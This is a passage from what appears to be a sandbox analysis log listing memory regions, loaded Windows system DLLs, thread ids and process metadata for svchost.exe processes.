0xd39e600000 end_va = 0xd39e6fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e600000" filename = "" Region: id = 4267 start_va = 0xd39e700000 end_va = 0xd39e7fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e700000" filename = "" Region: id = 4268 start_va = 0xd39e800000 end_va = 0xd39e8fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e800000" filename = "" Region: id = 4269 start_va = 0xd39e900000 end_va = 0xd39e9fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e900000" filename = "" Region: id = 4270 start_va = 0x7df5ff0b0000 end_va = 0x7ff5ff0affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff0b0000" filename = "" Region: id = 4271 start_va = 0x7ff786f4e000 end_va = 0x7ff786f4ffff entry_point = 0x0 region_type = private name = "private_0x00007ff786f4e000" filename = "" Region: id = 4272 start_va = 0x7ff786f54000 end_va = 0x7ff786f55fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f54000" filename = "" Region: id = 4273 start_va = 0x7ff786f56000 end_va = 0x7ff786f57fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f56000" filename = "" Region: id = 4274 start_va = 0x7ff786f58000 end_va = 0x7ff786f59fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f58000" filename = "" Region: id = 4275 start_va = 0x7ff786f5a000 end_va = 0x7ff786f5bfff entry_point = 0x0 region_type = private name = "private_0x00007ff786f5a000" filename = "" Region: id = 4276 start_va = 0x7ff786f5c000 end_va = 0x7ff786f5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff786f5c000" filename = "" Region: id = 4277 start_va = 0x7ff786f5e000 end_va = 0x7ff786f5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff786f5e000" filename = "" Region: id = 4278 start_va = 0x7ff786f60000 end_va = 0x7ff786f61fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f60000" filename = "" Region: id = 4279 start_va = 0x7ff786f62000 end_va = 0x7ff786f63fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f62000" filename = "" Region: id = 4280 start_va = 0x7ff786f64000 end_va = 0x7ff786f65fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f64000" filename = "" Region: id = 4281 start_va = 0x7ff786f66000 end_va = 0x7ff786f67fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f66000" filename = "" Region: id = 4282 start_va = 0x7ff786f68000 end_va = 0x7ff786f69fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f68000" filename = "" Region: id = 4283 start_va = 0x7ff786f6a000 end_va = 0x7ff786f6bfff entry_point = 0x0 region_type = private name = "private_0x00007ff786f6a000" filename = "" Region: id = 4284 start_va = 0x7ff786f6c000 end_va = 0x7ff786f6dfff entry_point = 0x0 region_type = private name = "private_0x00007ff786f6c000" filename = "" Region: id = 4285 start_va = 0x7ff786f6e000 end_va = 0x7ff786f6ffff entry_point = 0x0 region_type = private name = "private_0x00007ff786f6e000" filename = "" Region: id = 4286 start_va = 0x7ff786f70000 end_va = 0x7ff78706ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff786f70000" filename = "" Region: id = 4287 start_va = 0x7ff787070000 end_va = 0x7ff787092fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787070000" filename = "" Region: id = 4288 start_va = 0x7ff787093000 end_va = 0x7ff787093fff entry_point = 0x0 region_type = private name = "private_0x00007ff787093000" filename = "" Region: id = 4289 start_va = 0x7ff787094000 end_va = 0x7ff787095fff entry_point = 0x0 region_type = private name = "private_0x00007ff787094000" filename = "" Region: id = 4290 start_va = 0x7ff787096000 end_va = 0x7ff787097fff entry_point = 0x0 region_type = private name = "private_0x00007ff787096000" filename = "" Region: id = 4291 start_va = 0x7ff787098000 end_va = 0x7ff787099fff entry_point = 0x0 region_type = private name = "private_0x00007ff787098000" filename = "" Region: id = 4292 start_va = 0x7ff78709a000 end_va = 0x7ff78709bfff entry_point = 0x0 region_type = private name = "private_0x00007ff78709a000" filename = "" Region: id = 4293 start_va = 0x7ff78709c000 end_va = 0x7ff78709dfff entry_point = 0x0 region_type = private name = "private_0x00007ff78709c000" filename = "" Region: id = 4294 start_va = 0x7ff78709e000 end_va = 0x7ff78709ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78709e000" filename = "" Region: id = 4295 start_va = 0x7ff787ec0000 end_va = 0x7ff787eccfff entry_point = 0x7ff787ec0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4296 start_va = 0x7ffade4d0000 end_va = 0x7ffade659fff entry_point = 0x7ffade4d0000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 4297 start_va = 0x7ffae1490000 end_va = 0x7ffae1514fff entry_point = 0x7ffae1490000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 4298 start_va = 0x7ffae59b0000 end_va = 0x7ffae59f2fff entry_point = 0x7ffae59b0000 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 4299 start_va = 0x7ffaf0480000 end_va = 0x7ffaf04affff entry_point = 0x7ffaf0480000 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 4300 start_va = 0x7ffaf07e0000 end_va = 0x7ffaf07edfff entry_point = 0x7ffaf07e0000 region_type = mapped_file name = "cmintegrator.dll" filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll") Region: id = 4301 start_va = 0x7ffaf07f0000 end_va = 0x7ffaf0809fff entry_point = 0x7ffaf07f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4302 start_va = 0x7ffaf0810000 end_va = 0x7ffaf0825fff entry_point = 0x7ffaf0810000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4303 start_va = 0x7ffaf0830000 end_va = 0x7ffaf0865fff entry_point = 0x7ffaf0830000 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll") Region: id = 4304 start_va = 0x7ffaf0870000 end_va = 0x7ffaf0907fff entry_point = 0x7ffaf0870000 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 4305 start_va = 0x7ffaf09e0000 end_va = 0x7ffaf0a27fff entry_point = 0x7ffaf09e0000 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 4306 start_va = 0x7ffaf0a30000 end_va = 0x7ffaf0a8cfff entry_point = 0x7ffaf0a30000 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 4307 start_va = 0x7ffaf0ac0000 end_va = 0x7ffaf0acafff entry_point = 0x7ffaf0ac0000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 4308 start_va = 0x7ffaf0ad0000 end_va = 0x7ffaf0ad7fff entry_point = 0x7ffaf0ad0000 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 4309 start_va = 0x7ffaf0ae0000 end_va = 0x7ffaf0bf0fff entry_point = 0x7ffaf0ae0000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 4310 start_va = 0x7ffaf0de0000 end_va = 0x7ffaf0f10fff entry_point = 0x7ffaf0de0000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 4311 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4312 start_va = 0x7ffaf11d0000 end_va = 0x7ffaf1241fff entry_point = 0x7ffaf11d0000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 4313 start_va = 0x7ffaf1420000 end_va = 0x7ffaf1430fff entry_point = 0x7ffaf1420000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 4314 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4315 start_va = 0x7ffaf1950000 end_va = 0x7ffaf1958fff entry_point = 0x7ffaf1950000 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 4316 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4317 start_va = 0x7ffaf19a0000 end_va = 0x7ffaf19a9fff entry_point = 0x7ffaf19a0000 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 4318 start_va = 0x7ffaf19b0000 end_va = 0x7ffaf1b5afff entry_point = 0x7ffaf19b0000 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 4319 start_va = 0x7ffaf1b70000 end_va = 0x7ffaf1b87fff entry_point = 0x7ffaf1b70000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4320 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4321 start_va = 0x7ffaf2db0000 end_va = 0x7ffaf2dd6fff entry_point = 0x7ffaf2db0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4322 start_va = 0x7ffaf3170000 end_va = 0x7ffaf31a1fff entry_point = 0x7ffaf3170000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 4323 start_va = 0x7ffaf31b0000 end_va = 0x7ffaf3231fff entry_point = 0x7ffaf31b0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 4324 start_va = 0x7ffaf3360000 end_va = 0x7ffaf3382fff entry_point = 0x7ffaf3360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4325 start_va = 0x7ffaf3490000 end_va = 0x7ffaf349bfff entry_point = 0x7ffaf3490000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 4326 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4327 start_va = 0x7ffaf36f0000 end_va = 0x7ffaf36fbfff entry_point = 0x7ffaf36f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4328 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4329 start_va = 0x7ffaf3ab0000 end_va = 0x7ffaf3b57fff entry_point = 0x7ffaf3ab0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4330 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4331 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4332 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4333 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4334 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4335 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4336 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4337 start_va = 0x7ffaf44b0000 end_va = 0x7ffaf44c0fff entry_point = 0x7ffaf44b0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4338 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4339 start_va = 0x7ffaf44e0000 end_va = 0x7ffaf4533fff entry_point = 0x7ffaf44e0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 4340 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4341 start_va = 0x7ffaf4c80000 end_va = 0x7ffaf4e40fff entry_point = 0x7ffaf4c80000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4342 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4343 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4344 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4345 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4346 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4347 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4348 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4349 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4350 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4351 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4352 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4353 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4354 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4355 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6421 start_va = 0x7ffae9fa0000 end_va = 0x7ffae9fb0fff entry_point = 0x7ffae9fa0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 6422 start_va = 0xd39ca00000 end_va = 0xd39ca7ffff entry_point = 0x0 region_type = private name = "private_0x000000d39ca00000" filename = "" Region: id = 6423 start_va = 0x7ff787098000 end_va = 0x7ff787099fff entry_point = 0x0 region_type = private name = "private_0x00007ff787098000" filename = "" Region: id = 6424 start_va = 0x7ffaef560000 end_va = 0x7ffaef5defff entry_point = 0x7ffaef560000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 6463 start_va = 0x7ffae9470000 end_va = 0x7ffae9483fff entry_point = 0x7ffae9470000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 6464 start_va = 0xd39da00000 end_va = 0xd39dafffff entry_point = 0x0 region_type = private name = "private_0x000000d39da00000" filename = "" Region: id = 6465 start_va = 0x7ff786f58000 end_va = 0x7ff786f59fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f58000" filename = "" Region: id = 7004 start_va = 0x7ffae9490000 end_va = 0x7ffae9587fff entry_point = 0x7ffae9490000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 7019 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7263 start_va = 0x7ffaef620000 end_va = 0x7ffaef6f5fff entry_point = 0x7ffaef620000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 7435 start_va = 0xd39e300000 end_va = 0xd39e3fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e300000" filename = "" Region: id = 7436 start_va = 0x7ff786f52000 end_va = 0x7ff786f53fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f52000" filename = "" Region: id = 7793 start_va = 0xd39bd40000 end_va = 0xd39bd40fff entry_point = 0x0 region_type = private name = "private_0x000000d39bd40000" filename = "" Region: id = 7800 start_va = 0xd39e500000 end_va = 0xd39e5fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e500000" filename = "" Region: id = 7801 start_va = 0xd39e600000 end_va = 0xd39e6fffff entry_point = 0x0 region_type = private name = "private_0x000000d39e600000" filename = "" Region: id = 7802 start_va = 0x7ff786f4e000 end_va = 0x7ff786f4ffff entry_point = 0x0 region_type = private name = "private_0x00007ff786f4e000" filename = "" Region: id = 7803 start_va = 0x7ff786f50000 end_va = 0x7ff786f51fff entry_point = 0x0 region_type = private name = "private_0x00007ff786f50000" filename = "" Region: id = 7804 start_va = 0xd39ea00000 end_va = 0xd39eafffff entry_point = 0x0 region_type = private name = "private_0x000000d39ea00000" filename = "" Region: id = 7828 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 7829 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 9300 start_va = 0xd39bd50000 end_va = 0xd39bd58fff entry_point = 0xd39bd50000 region_type = mapped_file name = "winmgmtr.dll" filename = "\\Windows\\System32\\wbem\\WinMgmtR.dll" (normalized: "c:\\windows\\system32\\wbem\\winmgmtr.dll") Thread: id = 446 os_tid = 0xdd4 Thread: id = 447 os_tid = 0xf94 Thread: id = 448 os_tid = 0xf88 Thread: id = 449 os_tid = 0x6d8 Thread: id = 450 os_tid = 0x830 Thread: id = 451 os_tid = 0x540 Thread: id = 452 os_tid = 0x78c Thread: id = 453 os_tid = 0x384 Thread: id = 454 os_tid = 0x378 Thread: id = 455 os_tid = 0x8 Thread: id = 456 os_tid = 0x27c Thread: id = 457 os_tid = 0x254 Thread: id = 458 os_tid = 0x250 Thread: id = 459 os_tid = 0x128 Thread: id = 460 os_tid = 0x3dc Thread: id = 461 os_tid = 0x3b8 Thread: id = 462 os_tid = 0x3b4 Thread: id = 463 os_tid = 0x3b0 Thread: id = 464 os_tid = 0x39c Thread: id = 465 os_tid = 0x38c Thread: id = 466 os_tid = 0x344 Thread: id = 823 os_tid = 0xefc Thread: id = 827 os_tid = 0xdb4 Thread: id = 881 os_tid = 0x1a4 Thread: id = 902 os_tid = 0xfb8 Thread: id = 903 os_tid = 0xb40 Process: id = "45" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3e7fb000" os_pid = "0x358" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xa], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\DeviceAssociationService" [0xa], "NT SERVICE\\DevQueryBroker" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\DsSvc" [0xa], "NT SERVICE\\fhsvc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\NcbService" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\ScDeviceEnum" [0xa], "NT SERVICE\\SensorService" [0xa], "NT SERVICE\\SmsRouter" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\svsvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\vmicguestinterface" [0xa], "NT SERVICE\\vmickvpexchange" [0xa], "NT SERVICE\\vmicshutdown" [0xa], "NT SERVICE\\vmicvmsession" [0xa], "NT SERVICE\\vmicvss" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\WiaRpc" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xe], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e333" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2604 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2605 start_va = 0xb40ad50000 end_va = 0xb40ad5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b40ad50000" filename = "" Region: id = 2606 start_va = 0xb40ad60000 end_va = 0xb40ad60fff entry_point = 0xb40ad60000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2607 start_va = 0xb40ad70000 end_va = 0xb40ad83fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b40ad70000" filename = "" Region: id = 2608 start_va = 0xb40ad90000 end_va = 0xb40ae0ffff entry_point = 0x0 region_type = private name = "private_0x000000b40ad90000" filename = "" Region: id = 2609 start_va = 0xb40ae10000 end_va = 0xb40ae13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b40ae10000" filename = "" Region: id = 2610 start_va = 0xb40ae20000 end_va = 0xb40ae20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b40ae20000" filename = "" Region: id = 2611 start_va = 0xb40ae30000 end_va = 0xb40ae31fff entry_point = 0x0 region_type = private name = "private_0x000000b40ae30000" filename = "" Region: id = 2612 start_va = 0xb40ae40000 end_va = 0xb40aebffff entry_point = 0x0 region_type = private name = "private_0x000000b40ae40000" filename = "" Region: id = 2613 start_va = 0xb40aec0000 end_va = 0xb40aec0fff entry_point = 0x0 region_type = private name = "private_0x000000b40aec0000" filename = "" Region: id = 2614 start_va = 0xb40aed0000 end_va = 0xb40aed0fff entry_point = 0x0 region_type = private name = "private_0x000000b40aed0000" filename = "" Region: id = 2615 start_va = 0xb40aee0000 end_va = 0xb40aee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b40aee0000" filename = "" Region: id = 2616 start_va = 0xb40aef0000 end_va = 0xb40aef6fff entry_point = 0x0 region_type = private name = "private_0x000000b40aef0000" filename = "" Region: id = 2617 start_va = 0xb40af00000 end_va = 0xb40affffff entry_point = 0x0 region_type = private name = "private_0x000000b40af00000" filename = "" Region: id = 2618 start_va = 0xb40b000000 end_va = 0xb40b0bdfff entry_point = 